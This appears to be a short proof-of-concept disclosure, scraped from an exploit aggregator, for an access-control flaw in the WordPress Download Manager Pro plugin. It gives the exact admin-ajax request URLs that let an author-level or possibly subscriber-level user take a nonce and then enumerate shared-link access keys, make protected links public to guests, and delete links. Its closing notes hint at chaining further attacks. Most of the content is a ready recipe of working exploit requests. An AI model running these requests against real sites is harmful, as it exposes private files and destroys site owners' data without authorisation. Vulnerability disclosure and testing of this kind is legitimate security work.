## https://sploitus.com/exploit?id=WPEX-ID:BC88AA10-B861-4426-8BCD-AB1B4A2214AB
With the Pro version installed, Login as author, open the All Package page from the plugin (/wp-admin/edit.php?post_type=wpdmpro) and grab the nonce from the __edlnonce input
Then open https://example.com/wp-admin/admin-ajax.php?__wpdm_getlinkdet=<NONCE>&action=wpdm_getlinkdet&linkid=1 and increment the linkid parameter to discover all access_key along with the full URL to access the shared links.
If a link is protected, it can be updated the same way to change its settings and make it accessible to All Visitors (guest):
https://example.com/wp-admin/admin-ajax.php?__wpdm_updatelink=<NONCE>&action=wpdm_updatelink&ID=2&access%5Broles%5D%5B%5D=guest
Links can also be arbitrary deleted: https://example.com/wp-admin/admin-ajax.php?__wpdm_deletelink=<NONCE>&action=wpdm_deletelink&linkid=1
Notes:
If an authenticated user has access to a shared asset URL, the nonce generated by the NONCE_KEY action will be displayed in them (via the __wpdm_addcomment for example); If the Dashboard page from the plugin feature is enabled, then the nonce generated by the NONCE_KEY action will be displayed via the logout parameter, making the issues above exploitable by any authenticated users, such as subscribers. There might be other (and easier to reach) locations where the nonce is displayed as well.
The PoC above are example of what could be done, other attacks are possible (and could be chained depending on the blog to achieve higher goals) but have not been disclosed.